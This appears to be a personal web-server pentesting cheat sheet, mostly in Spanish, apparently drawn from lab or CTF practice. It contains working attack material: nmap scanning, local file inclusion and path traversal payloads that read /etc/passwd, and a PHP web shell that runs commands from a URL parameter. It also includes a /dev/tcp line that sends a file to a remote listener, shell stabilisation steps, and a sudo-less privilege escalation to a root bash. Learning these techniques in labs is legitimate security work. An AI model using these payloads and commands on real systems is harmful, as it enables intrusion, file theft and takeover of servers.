## 1. Information gathering
Every attacker tries to collect as much information as possible about the target web server. The attacker gathers the information and then analyzes it to find lapses in the current security mechanisms of the web server


Obtener todos los puertos abiertos
```bash
$ nmap -p- --open -sS --min-rate 5000 -n -Pn -vvv -oG AllPorts <IP>
```

Obtener de cada puerto el nombre del servicio
```bash
nmap -v -sCV -p22,80 <IP> -oN Targeted
```

Si queremos saber la distribución del SO de la máquina vulnerable a la que nos estamos enfrentando. Por ejemplo, basando en el resultado anterior podemos localizar el resultado del ssh, y copiar la linea "OpenSSH 9.0p1 Ubuntu 1ubuntu7.3 launchpad"


Buscar exploit en base a los servicios abiertos
```bash
searchsploit ssh user enumeration
```

Directory listing, con nmap, que actúa como un minifuser. Es algo mas rápido, pero no mas completo
```bash
nmap --script http-enum -p80 <IP> -oN webScan
```

-----

Abrir burpsuite sin que deje trazas
```bash
$ burpsuite &> /dev/null & disown
```

-----

Podemos exploat ese parámetro en búsqueda de vulnerabilidades "10.129.15.190/shop/index.php?page=product&id=3"
Haciendo la siguiente modificación:
```
10.129.15.190/shop/index.php?page=/etc/passwd&id=3
```

Directory traversal
```
10.129.15.190/shop/index.php?page=../../../../../../etc/passwd&id=3
```

wrapper, local file inclusion
```
10.129.15.190/shop/index.php?page=php://filter/convert.base64-encode/resource=../../../../../../etc/passwd&id=3
```

-----

Localizar los scripts de nmap
```bash
locate .nse
```

Si queremos ver las categorias, realizamos lo siguiente:
```bash
locate .nse | xargs grep --color 'categories'
```

Si queremos ver que categorías únicas existen:
```bash
locate .nse | xargs grep --color 'categories' | grep -oP '".*?"' | sort -u | column
```

Lanzar dos categorias de scripts 
```bash
nmap --script "vuln and safe"
```

-----

Montar un servidor web
```bash
python3 -m http.server 80
```


Montar un servidor web con PHP
1. 
```bash
php -S 0.0.0.0:80
```

2. file: cmd.php
```
<?php
  system($_GET['cmd']);
?>
```

3. Acedemos a la url "http://localhost/cmd.php"

4. Lanzamos un parametro "http://localhost/cmd.php?cmd=whoami"


## 2. Web server footprinting
The purpose of footprinting is to gather information about the security aspects of a web server with the help of tools or footprinting techniques. Through footprinting, attackers can determine the web server’s remote access capabilities, its ports and services, and other aspects of its security


## 3. Website mirroring
Website mirroring is a method of copying a website and its content onto another server for offline browsing. With a mirrored website, an attacker can view the detailed structure of the website

## 4. Vulnerability scanning
Vulnerability scanning is a method of finding the vulnerabilities and misconfigurations of a web server. Attackers scan for vulnerabilities with the help of automated tools known as vulnerability scanners

## 5. Session hijacking
Attackers can perform session hijacking after identifying the current session of the client. The attacker takes complete control over the user session through session hijacking


### 5.1 Consola Interactiva
```bash
$ #1. Modo bash 
$ script /dev/null -c bash
$ #2. Ponerlo en segundo plano 
$ ^z
$ #3. 
$ stty raw -echo ; fg
$ #4. Resetear el xterm
$ $ reset xterm
$ #5. Hacer uso de XTERM en la bash
$ export TERM=xterm
$ #6. Obtener el size de la terminal
$ $stty size
$ #7. Configurar un size
$ stty rows 44 columns 184
```

### 5.2 Enviar información

Abrir un puerto de escucha para recibir información
```bash
$ nc -lnvp 443 | bat -l python
```

Enviar información a ese puerto de escucha
```bash
$ cat httpd.py > /dev/tcp/<IP>/<PORT>
```

### 5.3 Escalado de privilegios - 1 Method de ejemplo. Permisos de SUDO

```bash
$ #Comprobar si tenemos permisos de sudo 
$ sudo -l
$ #Si verficamos que nos dan privilegios para realizar un systemctl status ...
$ sudo systemctl status ...
$ #Abria que intentar que la ventana salga páginada, tambien podemos formar a cambiarle el "stty"
$ stty rows 40  columns 50
$ #Durante la carga del "less" poner "!/bin/bash"

```


## 6. Web server password hacking
Attackers use password-cracking methods such as brute-force attacks, hybrid attacks, and dictionary attacks to crack the web server’s password
